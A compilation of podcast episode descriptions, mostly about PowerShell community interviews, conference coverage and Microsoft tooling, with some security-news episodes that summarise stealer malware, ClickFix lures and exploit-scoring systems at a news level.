In this episode of the PowerShell Podcast, host Andrew Pla reunites with PowerShell legend Fred, diving deep into productivity with hotkeys and key bindings, EntraAuth, C# integration, and community reflections from PowerShell Conference EU. Fred shares practical advice for improving your daily workflow, how to extend PowerShell with C#, and why participation in the community—whether through conferences or contributing modules—can be a game-changer for your career. What You'll Learn: How to improve your coding efficiency with advanced hotkeys and key bindings The difference between hotkeys and key bindings and how to create your own Insights into Fred's EntraAuth module and why federated credentials matter When it makes sense to use C# alongside PowerShell How community involvement can elevate your career What makes PowerShell Conference EU a unique experience Tips for new speakers interested in submitting conference talks Bio & Links: Fred Weinmann is a seasoned Cloud Solution Architect at Microsoft and a renowned PowerShell expert with years of experience designing and implementing scalable solutions. A prolific creator, Fred has developed key tools like PSFramework, PSModuleDevelopment, PSUtil, and PSFramework.Nuget, which empowers developers and IT professionals to optimize their workflows. Passionate about technology and problem-solving, Fred's innovative approach to PowerShell module development and his commitment to community-driven open-source projects have made him a respected figure in the PowerShell community. 
https://github.com/FriedrichWeinmann/EntraAuth https://github.com/PowershellFrameworkCollective/PSFramework.NuGet https://github.com/FriedrichWeinmann/string https://andrewpla.tech/links https://psconf.eu https://github.com/PowershellFrameworkCollective/psframework Fred's PSConfEU PSFramework.Nuget talk: https://www.youtube.com/watch?v=iMSOVwmBXrk Check out PDQ Connect https://pdq.com/podcast Join the PowerShell Scripting channel: https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/TZPy4X6yLjM The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
How do you get from ClickOps to DevOps? While at Build, Richard chatted with Steven Bucher about using Copilot in Azure to help build PowerShell scripts with Azure CLI to get you moving down the path of repeatable deployment. Steven talks about interacting with Copilot in Azure through the Portal, Azure CLI, and PowerShell. Using tools like GitHub Copilot in Visual Studio Code can help you start making Infrastructure as Code in Bicep or Terraform to move you along the path of automating reliable deployments!
Links: Copilot in Azure; Azure CLI; Terraform; AI Shell; PowerShell 7.5; Bicep; GitHub Copilot on VS Code
Recorded May 19, 2025
In this insightful episode of the PowerShell Podcast, host Andrew Pla welcomes longtime friend and seasoned technologist Ryan Coates. Together, they explore the intersection of PowerShell and C#, discuss the natural evolution of tech careers, and examine the role of continuous learning in long-term success. Ryan shares a wealth of perspective from decades in IT—covering everything from early networking to modern cloud architectures and why C# is a practical next step for PowerShell users. Whether you're deep in automation or eyeing your next language leap, this conversation is packed with career wisdom, developer philosophy, and some solid tech nostalgia. What You'll Learn: Why C# is a great next step for experienced PowerShell users Use cases where C# offers performance or capability advantages over PowerShell How PowerShell and C# skills complement each other in the .NET ecosystem Ryan's journey from MCSE teen prodigy to early retirement Why soft skills are just as vital as technical skills for senior roles The value of working across many technologies and industries early in your career Insights into DevOps maturity, architecture thinking, and lifelong learning Bio & Links: Ryan Coates is an Enterprise Architect with 25+ years in IT, evolving from systems ops to DevOps and developer advocacy. He leads internal API and DevRel strategy at a global consulting firm. Passionate about mentoring, Ryan speaks at conferences on cloud and automation and helps run Microsoft Cloud, DevOps, and PowerShell user groups in Boise, Idaho. 
https://linkedin.com/in/ryandcoates https://twitter.com/ryandcoates https://discord.gg/pdq https://andrewpla.tech/links Ryan's C# Talk at PS Wednesday: https://www.youtube.com/watch?v=hOaFdHTlDXE Ryan's Summit Talk: https://www.youtube.com/watch?v=AePjFyuWvg8 Join the PowerShell Scripting Channel on PDQ Discord: https://discord.gg/pdq Check out PDQ Connect: https://pdq.com/podcast The PowerShell Podcast on YouTube: https://youtu.be/72UCneA1X40 The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast
In this episode of the PowerShell Podcast, Andrew Pla welcomes longtime friend and DevOps Endpoint Engineer David Richmond. Fresh off his PowerShell Wednesday presentation, David shares insights into the power of splatting in PowerShell, centralizing automations, and driving organizational change through best practices and leadership. The conversation explores the evolution of automation practices, Git adoption in Ops, secrets management using Azure Key Vault, and how empowering others can multiply technical impact. It's an inspiring blend of deep PowerShell knowledge and practical career development advice. What You'll Learn: What splatting is in PowerShell and why it's such a powerful coding practice How to organize, simplify, and clean up your scripts with hash tables and ordered dictionaries David's journey from solo IT support to leading centralized automation efforts Pro tips on Git, module development, credential management, and code organization The benefits of creating training sessions and fostering a team-wide PowerShell culture Why data-driven automation metrics can win leadership support How PowerShell can scale your impact and accelerate your career Bio & Links: David Richmond started writing scripts in the Macintosh OS days (the 90s!) and hasn't stopped. Currently working in the every-OS endpoint engineering / devops space, particularly focused on internal automations team skillups in PowerShell and beyond. https://discord.gg/pdq https://www.linkedin.com/in/david-s-richmond/ https://dev.to/celadin https://bsky.app/profile/davidsrichmond.com Splatting PowerShell Wednesday: https://www.youtube.com/watch?v=8oesn0HgGxE https://github.com/PoshCode/PowerShellPracticeAndStyle The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast The PowerShell Podcast on YouTube: https://youtu.be/_cbpGxZOHS4 Help topic: help about_splatting
Bart had an itch to scratch, and he decided to scratch it with PowerShell. You'll remember that he gave us a teaser Tidbit seven months ago in Tidbit 11, and we still haven't started learning PowerShell so this one is yet another teaser. The itch he had was trying to understand the "Monty Hall Problem" [en.wikipedia.org/...](https://en.wikipedia.org/wiki/Monty_Hall_problem), and by writing a script to simulate a thousand rounds of the game, he was able to finally understand the solution. It is great fun hearing Bart describe how he spent the first few days of his annual leave programming ... because it was fun! You can find Bart's fabulous tutorial shownotes and the audio podcast at pbs.bartificer.net. Read an unedited, auto-generated transcript with chapter marks: PBS_2025_07_19 Join our Slack at podfeet.com/slack and check out the Programming By Stealth channel under #pbs. Support Bart by going to lets-talk.ie and pushing one of the big blue support buttons. Referral Links: Setapp - 1 month free for you and me Parallels Toolbox - 3 months free for you and me Learn through MacSparky Field Guides - 15% off for you and me Backblaze - One free month for me and you Eufy - $40 for me if you spend $200. Sadly nothing in it for you. PIA VPN - One month added to Paid Accounts for both of us CleanShot X - Earns me $25%, sorry nothing in it for you but my gratitude
Troubleshoot identity issues, investigate risky users and apps, and optimize Conditional Access policies using natural language—with built-in AI from Microsoft Security Copilot in Microsoft Entra. Instead of switching between logs, PowerShell, and spreadsheets, Security Copilot centralizes insights for faster, more focused action. Resolve compromised accounts, uncover ownerless or high-risk apps, and tighten policy coverage with clear insights, actionable recommendations, and auto-generated policies. Strengthen security posture and reclaim time with a smarter, more efficient approach powered by Security Copilot. Diana Vicezar, Microsoft Entra Product Manager, shares how to streamline investigations and policy management using AI-driven insights and automation. ► QUICK LINKS: 00:00 - Microsoft Entra with Security Copilot 01:26 - Conditional Access Optimization Agent 03:35 - Investigate risky users 05:49 - Investigate risky apps 07:34 - Personalized security posture recommendations 08:20 - Wrap up ► Link References Check out https://aka.ms/SecurityCopilotAgentsinMicrosoftEntra ► Unfamiliar with Microsoft Mechanics? As Microsoft's official video series for IT, you can watch and share valuable content and demos of current and upcoming tech from the people who build it at Microsoft. • Subscribe to our YouTube: https://www.youtube.com/c/MicrosoftMechanicsSeries • Talk with other IT Pros, join us on the Microsoft Tech Community: https://techcommunity.microsoft.com/t5/microsoft-mechanics-blog/bg-p/MicrosoftMechanicsBlog • Watch or listen from anywhere, subscribe to our podcast: https://microsoftmechanics.libsyn.com/podcast ► Keep getting this insider knowledge, join us on social: • Follow us on Twitter: https://twitter.com/MSFTMechanics • Share knowledge on LinkedIn: https://www.linkedin.com/company/microsoft-mechanics/ • Enjoy us on Instagram: https://www.instagram.com/msftmechanics/ • Loosen up with us on TikTok: https://www.tiktok.com/@msftmechanics
In this special live episode recorded amidst the rain-soaked streets of Malmö during PSConfEU 2025, host Andrew Pla brings us a vibrant, multi-guest edition of the PowerShell Podcast. From impromptu bar chats to in-depth discussions on PowerShell modules, CI/CD pipelines, career growth, and community culture, this episode captures the heart of the PowerShell community in full force. Hear from speakers, first-time attendees, longtime community contributors, and PowerShell legends as they share their stories, projects, career journeys, favorite sessions, and the human side of tech. Guests: Harm Veenstra (PowerShellIsFun, MVP and Legend) Constantin Hager (PS Framework user & Inn-Salzach PowerShell Group organizer) Thomas Hadin (Swedish consultant, Discord regular) James Ruskin (Chocolatey engineer, bigtime PowerSheller, kind and smart) Emanuel Palm (Microsoft MVP and PSConfEU speaker) Suresh "SK" Krishnan (IAM pro & PowerShell podcast superfan) Topics Covered: Favorite PSConfEU 2025 sessions and key takeaways GitHub Actions & GitHub Apps deep dive Lightning talks & community demo formats User group organizing and mentoring new speakers Tools: PS Framework, Spectre.Console, AI Shell, ModuleBuilder PowerShell remoting, PSDefaultParameterValues, and CI pipelines Career development insights, perspective shifts, and personal growth Building friendships and networks in the PowerShell community Highlights: “There's no magic” – a recurring theme reminding listeners to understand what they're running. Reflections on how empathy and perspective can transform your IT career. A shoutout to the PowerShell Discord community and lesser-known contributors like weq and Chris Dent. Real stories of overcoming stage fright, pushing past visa issues, and finding belonging through tech.
Links: https://discord.gg/pdq https://psconf.eu https://andrewpla.tech/links Watch PowerShell Wednesday: https://www.youtube.com/playlist?list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B PSConfEU 2025 sessions: https://www.youtube.com/watch?v=9CJWhWdbTGU&list=PLDCEho7foSoo6tc8iNDSrxp27dG_gtm6g The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast The PowerShell Podcast on YouTube: https://youtu.be/RoVlp5XmXBc
Today we are joined by Selena Larson, Threat Researcher at Proofpoint, and co-host of Only Malware in the Building, as she discusses their work on "Amatera Stealer - Rebranded ACR Stealer With Improved Evasion, Sophistication." Proofpoint researchers have identified Amatera Stealer, a rebranded and actively developed malware-as-a-service (MaaS) variant of the former ACR Stealer, featuring advanced evasion techniques like NTSockets for stealthy C2 communication and WoW64 Syscalls to bypass user-mode defenses. Distributed via ClearFake web injects and the ClickFix technique, Amatera leverages multilayered PowerShell loaders, blockchain-based hosting, and creative social engineering to compromise victims. With enhanced capabilities to steal browser data, crypto wallets, and other sensitive files, Amatera poses a growing threat in the wake of disruptions to competing stealers like Lumma. Complete our annual audience survey before August 31. The research can be found here: Amatera Stealer: Rebranded ACR Stealer With Improved Evasion, Sophistication Learn more about your ad choices. Visit megaphone.fm/adchoices
In this episode, recorded live at PSConfEU, Andrew catches up with some of the PowerShell team from Microsoft to talk all things PowerShell—from AIShell to PSResourceGet to the future of DSC and OpenSSH. First up is Steven Bucher, Product Manager on the PowerShell team, who discusses the massive scale of PowerShell usage, the state of PowerShell 7, and the team's focus on security and reliability. He also gives an exciting walkthrough of AIShell and how it's helping users stay in the terminal while getting AI-driven help, error resolution, and integration with providers like Azure OpenAI and AI Foundry. Then we hear from Anam, a software engineer working on PSResourceGet, PowerShell Gallery, and security. She shares details on the rewrite of PowerShellGet, performance improvements, and new features like container registry support. She also dives into Microsoft's Artifact Registry (MAR) and offers her take on coding as a creative, artistic endeavor. Lastly, Tess joins the conversation to talk about OpenSSH and Desired State Configuration (DSC). She highlights the native cross-platform capabilities of DSC v3, its decoupling from PowerShell, and the move toward supporting resource development in languages like Python. Tess also shares the significance of SSH server availability in Windows Server 2025 and reflects on her open-source journey and love of outdoor sports. Whether you're managing packages, remoting with SSH, exploring AI integrations, or just want to know more about some of the people behind PowerShell, this episode delivers valuable insights from the team building the tools you use. 
Links and Mentions: https://www.linkedin.com/in/anamnavied/ https://www.linkedin.com/in/tess-gauthier-a43a368a/ https://www.linkedin.com/in/stevenabucher/ https://andrewpla.tech/links https://github.com/PowerShell/PowerShell https://github.com/PowerShell/AIShell https://github.com/PowerShell/PSResourceGet https://github.com/PowerShell/Win32-OpenSSH https://github.com/microsoft/DSC The PowerShell Podcast on YouTube: https://youtu.be/F4mVUHinjf4 The PowerShell Podcast: https://pdq.com/the-powershell-podcast Guests: Steven Bucher – Product Manager II on the PowerShell Team Anam Navied – Software Engineer 2 @ Microsoft Tess Gauthier – Software Engineer @ Microsoft | OpenSSH
Link to episode page This week's Cyber Security Headlines – Week in Review is hosted by Rich Stroffolino with guest Bil Harmer, operating partner and CISO, Craft Ventures. Check out Bil's page, KillSwitchAdvisory. Thanks to our show sponsor, ThreatLocker Alert fatigue, false positives, analyst burnout—you know the drill. What if you could stop threats before they run? ThreatLocker gives CISOs what they've been asking for: real control at the execution layer. Only approved apps, scripts, and executables run. Period. Known-good is enforced. Everything else? Denied by default. Ringfencing and storage control keep even trusted tools in their lane—so PowerShell doesn't become a weapon. And yes—it works at scale. Granular policies. Fast rollout. Built for modern infrastructure. You don't need more alerts. You need fewer chances for malware to make a move. ThreatLocker helps you flip the model—from detect-and-respond… to deny-and-verify. Go to ThreatLocker.com/CISO to schedule your free demo and close the last gap in your Zero Trust strategy, before it's exploited. All links and the video of this episode can be found on CISO Series.com
Hazel welcomes back Ryan Fetterman from the SURGe team to explore his new research on how large language models (LLMs) can assist those who work in security operations centers to identify malicious PowerShell scripts. From teaching LLMs through examples, to using retrieval-augmented generation and fine-tuning specialized models, Ryan walks us through three distinct approaches, with surprising performance gains.
In this episode of the PowerShell Podcast, host Andrew Pla reports live from PowerShell Conference Europe 2025 in Malmö, Sweden. With energy high and community engagement stronger than ever, Andrew chats with key figures shaping the PowerShell ecosystem. First, we hear from Gael Colas, organizer of PSConfEU and longtime community advocate, who discusses the significance of the conference and its international impact. Gael reflects on the challenges of organizing a multi-country event and the magic that happens when the community comes together in person. Later, Andrew connects with Stein Petersen, a speaker at PSConfEU. Stein shares insights into his talk on mental health, psychological safety, and building human-centric tech teams. Alongside his co-speaker, licensed therapist Tracy Sewell, they tackle burnout prevention and emotional resilience in the workplace. The discussion sheds light on the intersection between mental well-being and professional success in IT. This episode captures the unique mix of technical enthusiasm and human connection that defines the PowerShell community. Whether you're coding, coaching, or just trying to survive burnout, there's something here for you. Recorded on location at PowerShell Conference Europe 2025.
Links & Bio: https://psconf.eu https://andrewpla.tech/links https://www.linkedin.com/in/steinpetersen/ https://gaelcolas.com https://synedgy.com https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/paB3R1uA8jw The PowerShell Podcast: https://pdq.com/the-powershell-podcast
Gael Colas: Gael is the founder and director of SynEdgy Limited, a consulting company in the DevOps, Azure and PowerShell automation space, helping companies bring agility to their infrastructure management and operations. SynEdgy is also behind the PowerShell Conference Europe (PSConfEU), PSDayUK and contributes to many other user groups and events of the community.
In his spare time, Gael is a member of the PowerShell Working Groups, DSC Community committee member, and recipient of the Microsoft MVP award. Stein Petersen Stein is a cloud architect and passionate community contributor focused on mental health in IT. He is committed to fostering psychological safety, resilience, and emotional intelligence within tech teams.
In this episode of the PowerShell Podcast, we're joined by Steven Judd and Gilbert Sanchez, two active contributors and speakers in the PowerShell community. We talk about the Dos and Don'ts of PowerShell. We cover topics like documentation, testing, community, how you should view yourself in your growth, and even get some top tips on logging from those who have done PowerShell at the highest levels. Key Topics Covered: How community support leads to career breakthroughs Learning through teaching and presenting at conferences Overcoming nerves and imposter syndrome as new speakers The value of async learning and accountability through PowerShell Wednesdays Steven's PowerShell journey from System Admin to cybersecurity educator Gilbert's insights on mentorship, blogging, and personal development Embracing humility and finding joy in collaboration Whether you're just getting started or looking to deepen your PowerShell journey, this episode is a celebration of curiosity, courage, and community.
This week, we sit down with Anthony Howell, better known as The PoSh Wolf, for an inspiring and entertaining conversation about PowerShell, community, and creativity. From his early days in a two-person IT department to speaking at PowerShell Summit, Anthony shares how passion, persistence, and curiosity have fueled his journey. He dives into his creative use of PowerShell for managing game servers and even building a Discord bot, proving that automation isn't just for enterprise tasks. We explore how side projects can grow into real skills, the value of sharing in the community, and how embracing mistakes makes us all better. Anthony also gives insights into using .NET in PowerShell, learning Go, and building resilient systems for fun and work. Bio: Anthony Howell is a proud father, lucky husband, and passionate software builder. Since starting his IT career in 2009 as a helpdesk technician, he's followed his drive for automation from scripting sysadmin tasks in PowerShell to tackling DevOps and site reliability challenges. Known for always having a process improvement idea, Anthony shares insights from his journey to help others build smarter, more efficient systems. What You'll Learn: How Anthony got started with PowerShell and his first Summit experience Creative PowerShell use cases like Discord bots and game server management Lessons from mistakes and the power of testing Transitioning from PowerShell to .NET and even Go The importance of community and continuing to ask questions Links & Resources: https://www.linkedin.com/in/theposhwolf/ https://discord.gg/pdq https://theposhwolf.com/ https://andrewpla.tech/links Check out PDQ: https://pdq.com/podcast https://www.powershellgallery.com/packages/powershell-yaml/0.4.12 The PowerShell Podcast on YouTube: https://youtu.be/tOH5FXn0IhU
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Extracting With pngdump.py
Didier extended his pngdump.py script to make it easier to extract additional data appended to the end of the image file. https://isc.sans.edu/diary/Extracting%20With%20pngdump.py/32022
16 React Native Packages for GlueStack Backdoored Overnight
16 npm packages with over a million weekly downloads between them were compromised. The compromised packages include a remote admin tool that was seen before in similar attacks. https://www.aikido.dev/blog/supply-chain-attack-on-react-native-aria-ecosystem
Atomic MacOS Stealer Exploits Clickfix
MacOS users are now also targeted by fake captchas, tricking users into running exploit code. https://www.cloudsek.com/blog/amos-variant-distributed-via-clickfix-in-spectrum-themed-dynamic-delivery-campaign-by-russian-speaking-hackers
Microsoft INETPUB Script
Microsoft published a simple PowerShell script to restore the inetpub folder in case you removed it by mistake. https://www.powershellgallery.com/packages/Set-InetpubFolderAcl/1.0
Forecast = Stormy with a chance of TikTok malware showers—exploit scoring systems hot, but patch management outlook remains partly cloudy. Welcome to Storm⚡️Watch! In this episode, we're diving into the current state of cyber weather with a mix of news, analysis, and practical insights. This week, we tackle a fundamental question: are all exploit scoring systems bad, or are some actually useful? We break down the major frameworks:

**CVSS (Common Vulnerability Scoring System):** The industry standard for assessing vulnerability severity, CVSS uses base, temporal, and environmental metrics to give a comprehensive score. It's widely used but has limitations—especially since it doesn't always reflect real-world exploitability.

**Coalition Exploit Scoring System (ESS):** This system uses AI and large language models to predict the likelihood that a CVE will be exploited in the wild. ESS goes beyond technical severity, focusing on exploit availability and usage probabilities, helping organizations prioritize patching with better accuracy than CVSS alone.

**EPSS (Exploit Prediction Scoring System):** EPSS is a data-driven approach that estimates the probability of a vulnerability being exploited, using real-world data from honeypots, IDS/IPS, and more. It updates daily and helps teams focus on the most urgent risks.

**VEDAS (Vulnerability & Exploit Data Aggregation System):** VEDAS aggregates data from over 50 sources and clusters vulnerabilities, providing a score based on exploit prevalence and maturity. It's designed to help teams understand which vulnerabilities are most likely to be actively exploited.

**LEV/LEV2 (Likely Exploited Vulnerabilities):** Proposed by NIST, this metric uses historical EPSS data to probabilistically assess exploitation, helping organizations identify high-risk vulnerabilities that might otherwise be missed.

**CVSS BT:** This project enriches CVSS scores with real-world threat intelligence, including data from CISA KEV, ExploitDB, and more. It's designed to help organizations make better patching decisions by adding context about exploitability.

Next, we turn our attention to a troubling trend: malware distribution via TikTok. Attackers are using AI-generated videos, disguised as helpful software activation tutorials, to trick users into running malicious PowerShell commands. This “ClickFix” technique has already reached nearly half a million views. The malware, including Vidar and StealC, runs entirely in memory, bypassing traditional security tools and targeting credentials, wallets, and financial data. State-sponsored groups from Iran, North Korea, and Russia have adopted these tactics, making it a global concern. For employees, the takeaway is clear: never run PowerShell commands from video tutorials, and always report suspicious requests to IT. For IT teams, consider disabling the Windows+R shortcut for standard users, restrict PowerShell execution, and update security awareness training to include social media threats.

We also highlight the latest from Censys, VulnCheck, runZero, and GreyNoise—industry leaders providing cutting-edge research and tools for vulnerability management and threat intelligence. Don't miss GreyNoise's upcoming webinar on resurgent vulnerabilities and their impact on organizational security. And that's a wrap for this episode! We will be taking a short break from Storm Watch for the summer. We look forward to bringing more episodes to you in the fall! Storm Watch Homepage >> Learn more about GreyNoise >>
In this episode of the PowerShell Podcast, we take a detour from our typical PowerShell conversations to explore the fascinating world of game hacking with backend services developer Mateus Pimentel. Mateus shares his journey from crafting bots for MMORPGs to reverse engineering games and ultimately working in online services for a major gaming company. We discuss his early experiences hacking Tibia, how he overcame being hacked himself as a kid, and how those formative experiences shaped his approach to software development and cybersecurity. Mateus also dives into powerful learning experiences from hacking games, participating in Capture the Flag competitions, and avoiding the dark paths that lure many curious technologists. This episode is a compelling exploration of hacking culture, ethics, and personal transformation. Topics covered: From game hacking to working at a gaming company Mateus' early adventures reverse-engineering Tibia Lessons learned from being hacked as a kid Ethical hacking, personal growth, and career evolution The overlap between game hacking and cybersecurity Capture the Flag (CTF) competitions and their career value Understanding system protocols and reverse engineering Reflections on following your curiosity and avoiding burnout Notable quote: “Follow your passion. If it's fun, you'll learn 10 times faster.” Bio and Links: Mateus Pimentel is a software developer with a passion for software architecture, game modding and solving complex problems. From reverse engineering MMORPGs as a teenager to helping secure one of the gaming industry's most ambitious projects at a major gaming company, Mateus has cultivated deep technical skills grounded in a strong ethical framework. His journey from underground hacker to professional developer offers a unique and inspiring perspective on how curiosity and integrity can guide a meaningful career in tech.
Follow Mateus on LinkedIn: https://www.linkedin.com/in/pimentelmateus/ Connect with Andrew: https://andrewpla.tech/links Catch PowerShell Wednesdays weekly at 2 PM EST on discord.gg/pdq The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast Darza's Dominion Hacked: https://www.youtube.com/watch?v=ipqge4aJt3U Mystera Reborn Hacked: https://youtu.be/Gg6owdR_7h8?si=1Uk0a8RW9czs0TCm Using Remote Vision to watch a Player Battle: https://www.youtube.com/watch?v=poDkWlR-1ks Fractured Online Gold Machine: https://youtu.be/EIHJBdrr0Ac?si=Wis9DGinI5EKuN0O The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast The PowerShell Podcast on YouTube: https://youtu.be/8cxtg4QQjZQ
In this episode of the PowerShell Podcast, we welcome back Justin Grote, a Microsoft MVP and open-source powerhouse, for an in-depth and fast-paced conversation. Fresh off his PowerShell Wednesday presentation, Justin shares the thinking behind his latest innovations, including the creation of the high-performance ExcelFast module and his evangelism for dev containers and modern development workflows.

Key topics in this episode include:
Getting the most from VS Code – Justin shares power-user tips, favorite settings, and the evolution of his 1,000-line configuration file.
GitHub Copilot and real-world developer productivity – How Justin's approach to AI tooling shifted after experiencing measurable value in his PowerShell workflows.
Dev containers and runtime containers – A detailed breakdown of the difference, practical use cases, and how they transform collaboration, onboarding, and consistency.
ExcelFast – A brand-new module optimized for high-performance reading, writing, and streaming of large Excel and CSV datasets, developed with dev containers from day one.
Open-source contributions to PowerShell – Including enhanced logging for Invoke-RestMethod and building a dev container for the PowerShell repo itself.
PowerShell Conf EU previews – From a 90-minute VS Code optimization deep dive to a hands-on runspaces lab with GitHub Codespaces integration.

This episode is packed with practical advice, philosophy on tooling, and Justin's trademark blend of performance focus and community-first thinking. Whether you're a seasoned developer or looking to up your scripting game, you'll walk away with new ideas and resources to explore.

Guest Bio – Justin Grote
Justin Grote is a Microsoft MVP, PowerShell advocate, and open-source contributor with a deep focus on automation, performance, and developer productivity. Known for tools like ModuleFast and his work improving PowerShell workflows, Justin blends real-world experience with a passion for teaching and sharing. Whether he's optimizing VS Code, contributing to the PowerShell repo, or speaking at global conferences, Justin empowers the community with practical solutions and thoughtful insight.

Links:
Find Justin on GitHub, BlueSky, or on Discord (@JustinGrote): https://github.com/JustinGrote
Try out ExcelFast: https://github.com/JustinGrote/ExcelFast
PSConfEU Announcement: https://www.linkedin.com/feed/update/urn:li:activity:7328093268225806337/
Create Dev Container Docs: https://code.visualstudio.com/docs/devcontainers/create-dev-container
SecretManagement.DpapiNG: https://github.com/jborean93/SecretManagement.DpapiNG
Connect with Andrew on Socials: https://andrewpla.tech/links
Catch PowerShell Wednesdays weekly at 2 PM EST on discord.gg/pdq
The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
The PowerShell Podcast on YouTube: https://youtu.be/dHbWFUyUaOE
Agentic AI is the theme of the show this year, and this time it's multi-agent with orchestration! But first, we need to discuss the protestors. Paul and Richard have stories. So many stories!

Build 2025
New Microsoft 365 Copilot features are rolling out now because it's a day that ends in y
Tuning is the unexpected Build Bingo center square term - rolling out to agents
GitHub Copilot is open source in VS Code, more Win32 app support improvements, no more fees in Microsoft Store
A shift in making Windows 11 the best place for developers - some things said, some left unsaid
Edge gets new AI features too of course
New native app capabilities in Windows App SDK, React Native
And, pre-Build, 50 million Visual Studio users
Copilot for consumers does image generation now. Fun tip: You can Minecraft-ize photos
OpenAI has a coding agent too, obviously
And OpenAI is buying Jony Ive!

Windows
Administrator Protection is coming soon - And not just for businesses. This feels very much like the firewall in XP SP2, it's going to be disruptive
New 24H2 features in Release Preview: New text actions in Click to Do, a lot more
New 24H2 features in Dev and Beta: AI actions in File Explorer, Advanced Settings, Search improvements, more
New 23H2 features, Windows 10 features in Release Preview
Surface Laptop Studio RIP
Calendar companion app for Windows 11/M365
Microsoft may finally put the Teams antitrust issue in the EU behind

Xbox
Fortnite returns to the Apple App Store
Apple blocked it first, Epic complained to judge
And Microsoft files a legal motion against Apple and for Epic Games
Qualcomm job listing confirms Xbox plans to some degree
What happens when you combine Qualcomm NPU with Nvidia GPU?
Xbox May Update arrives and it's a big one
Retro Classic Games for Xbox Game Pass
Game Bar updates, Edge Game Assist, GeForce now etc. on PC
Custom Xbox gift cards
More streaming of your own games
Hellblade II is coming from Xbox to PS5
Many more games coming to Xbox Game Pass across platforms

Tips and Picks
App pick of the week: You can try Microsoft's command line editor now
Game pick of the week: Doom: The Dark Ages
RunAs Radio this week: PowerShell 7.5 and DSC 3.0.0 with Jason Helmick
Brown liquor pick of the week: Tamnavulin Sherry Cask

Hosts: Leo Laporte, Paul Thurrott, and Richard Campbell
Download or subscribe to Windows Weekly at https://twit.tv/shows/windows-weekly
Check out Paul's blog at thurrott.com
The Windows Weekly theme music is courtesy of Carl Franklin.
Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit
Sponsors: spaceship.com/twit uscloud.com
At RSAC Conference 2025, the conversation with Rob Allen, Chief Product Officer at ThreatLocker, centered on something deceptively simple: making cybersecurity effective by making it manageable.

During this on-location recap episode, Rob shares how ThreatLocker cut through the noise of flashy booths and AI buzzwords by focusing on meaningful, face-to-face conversations with customers and prospects. Their booth was an open, no-frills space, designed for real dialogue, not distractions. What caught people's attention, though, wasn't the booth layout; it was a live demonstration of a PowerShell-based attack using a rubber ducky device. It visually captured how traditional tools often miss malicious scripts and how ThreatLocker's controls shut it down immediately. That kind of simplicity, Rob explains, is the real differentiator.

Zero Trust Is a Journey, But It Doesn't Have to Be Complicated
One key message Rob emphasizes is that true security doesn't come from piling on more tools. Too many organizations rely on overlapping detection and response solutions, which leads to confusion and technical debt. "If you have five different jackets and they're all winter coats, you're not prepared for summer," Sean Martin jokes, reinforcing Rob's point that layers should be distinct, not redundant. ThreatLocker's approach simplifies Zero Trust by focusing on proactive control: limiting what can execute or communicate in the first place. Rob also points to the importance of vendor consolidation, not just from a purchasing standpoint but from an operational one. With ThreatLocker, multiple security capabilities are built natively into a single platform with one agent and one portal, avoiding the chaos of disjointed systems.

From Technical Wins to Human Connections
The conversation wraps with a reminder that cybersecurity isn't just about tools; it's about the people and community that make the work worthwhile. Rob, Marco Ciappelli, and Sean Martin reflect on their shared experiences around the event and even the lessons learned over a slice of Detroit-style pizza. While the crust may have been debatable, the camaraderie and commitment to doing security better were not.

Learn more about ThreatLocker: https://itspm.ag/threatlocker-r974

Guest: Rob Allen, Chief Product Officer, ThreatLocker | https://www.linkedin.com/in/threatlockerrob/

Resources
Learn more and catch more stories from ThreatLocker: https://www.itspmagazine.com/directory/threatlocker
Learn more and catch more stories from RSA Conference 2025 coverage: https://www.itspmagazine.com/rsac25

Keywords: sean martin, marco ciappelli, rob allen, cybersecurity, zero trust, threat prevention, powerShell, vendor consolidation, rsac2025, endpoint security, brand story, brand marketing, marketing podcast, brand story podcast

Catch all of our event coverage: https://www.itspmagazine.com/technology-and-cybersecurity-conference-coverage
Want to tell your Brand Story Briefing as part of our event coverage?
What's new in PowerShell 7.5? Richard talks to Jason Helmick about the latest version of PowerShell. Jason talks about 7.5 being a version with plenty of community contributions and what that means for everyone. He also discusses 7.6, which will be released as a long-term support version of PowerShell synchronized with .NET 10. Then, on to Desired State Configuration 3.0.0, which makes DSC work effectively across platforms, with or without PowerShell itself! 7.5 is a great version - are you up to date?

Links
PowerShell 7.5
PowerShell on GitHub
Desired State Configuration 3.0.0
WinGet Configuration
System Configuration Tools in Windows

Recorded April 4, 2025
In this episode of the PowerShell Podcast, we sit down with Brock Bingham, a longtime PowerShell enthusiast, educator, and community advocate. Recorded live from PDQ Headquarters in Salt Lake City, Utah, this episode captures the high energy and camaraderie of a PowerShell Wednesday in person. Brock shares his journey from PowerShell beginner to mentor, his passion for community building, and the power of sharing knowledge with others.

Key topics in this episode include:
Overcoming Stage Fright and Imposter Syndrome – How PowerShell Wednesday and live presentations have helped Brock gain confidence.
The Power of Documentation and Knowledge Sharing – Why good documentation and teaching others are critical for long-term growth.
Community Connection and Growth – How engaging with the PowerShell community can transform your career and personal development.
Exploring PowerShell Tools and Projects – From using Pester for testing to building cool GUIs with MDGRS, Brock dives into the creative side of PowerShell.
Learning from Failure and Embracing Red Text – Why mistakes are a critical part of the learning journey.
Finding Your Voice in the PowerShell World – Brock's advice for building confidence, sharing your work, and making an impact.

From caffeine-fueled coding sessions to discovering the power of collaboration, this episode is a heartfelt conversation about growth, mentorship, and building a career around PowerShell.

Join the conversation:
Connect with Brock Bingham on LinkedIn: https://www.linkedin.com/in/jonathanbrockbingham/
Connect with Brock on BlueSky: https://bsky.app/profile/brockbingham.bsky.social
Connect with Andrew: https://andrewpla.tech/links
Join PowerShell Wednesdays every Wednesday at 2 PM EST on discord.gg/pdq
The PowerShell Podcast: https://pdq.com/the-powershell-podcast
The PowerShell Podcast on YouTube:
